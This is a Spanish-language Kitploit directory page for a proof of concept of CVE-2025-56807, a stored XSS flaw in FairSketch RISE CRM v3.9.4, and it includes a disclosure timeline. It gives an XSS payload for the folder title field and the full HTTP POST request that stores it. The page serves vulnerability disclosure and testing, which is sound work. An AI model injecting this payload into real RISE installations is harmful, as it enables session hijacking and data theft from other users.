Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-56807 — Prueba de concepto para una vulnerabilidad XSS almacenado en FairSketch RISE Ultimate Project Manager & CRM v3.9.4, que demuestra la ejecución arbitraria de JavaScript mediante la inyección en el título de la carpeta. | Kitploit
Herramientas/GitHubGitHub/aqwainfosec/cve-2025-56807
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

Prueba de concepto para una vulnerabilidad XSS almacenado en FairSketch RISE Ultimate Project Manager & CRM v3.9.4, que demuestra la ejecución arbitraria de JavaScript mediante la inyección en el título de la carpeta.

Ver Repositorio
hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-56807

Descripción

Se descubrió una vulnerabilidad de Cross Site Scripting (XSS) almacenado en FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) en la funcionalidad del Administrador de archivos. La vulnerabilidad reside en el parámetro title que se envía al crear nuevas carpetas. Debido a una sanitización insuficiente de las entradas, un atacante puede inyectar payloads HTML/JavaScript (por ejemplo, <details/open/ontoggle=prompt(origin)>). El payload se almacena en el nombre de la carpeta y se ejecuta al listar las carpetas en el Administrador de archivos, lo que permite la ejecución arbitraria de JavaScript en el navegador de cualquier usuario que vea la carpeta afectada. Esto puede resultar en el secuestro de sesión y la exfiltración de datos.

[!NOTE]
Esta vulnerabilidad no es exclusiva de las cuentas de administrador. Puede explotarse con cualquier cuenta de usuario que tenga permiso para crear nuevas carpetas en el Administrador de archivos.

Cronología de divulgación

  • ID de CVE asignado: CVE-2025-56807
  • Descubrimiento: julio de 2025 (por Aqwa Hameed)
  • Notificación al proveedor: se envió un correo electrónico al soporte de Fairsketch
  • Respuesta: confirmado por el proveedor el 22 de julio de 2025

Prueba de concepto (PoC)

  1. Inicie sesión con credenciales válidas.

  2. Navegue a Files

    Panel de control

  3. Haga clic en New Folder

    Administrador de archivos

  4. Introduzca el siguiente payload en el campo Title:

root@kitploit:~
<details/open/ontoggle=prompt(origin)>

Título de la carpeta

  1. Recargue la página del Administrador de archivos para activar el payload

    Ejecución del payload

Solicitud

root@kitploit:~
POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
Descargar herramienta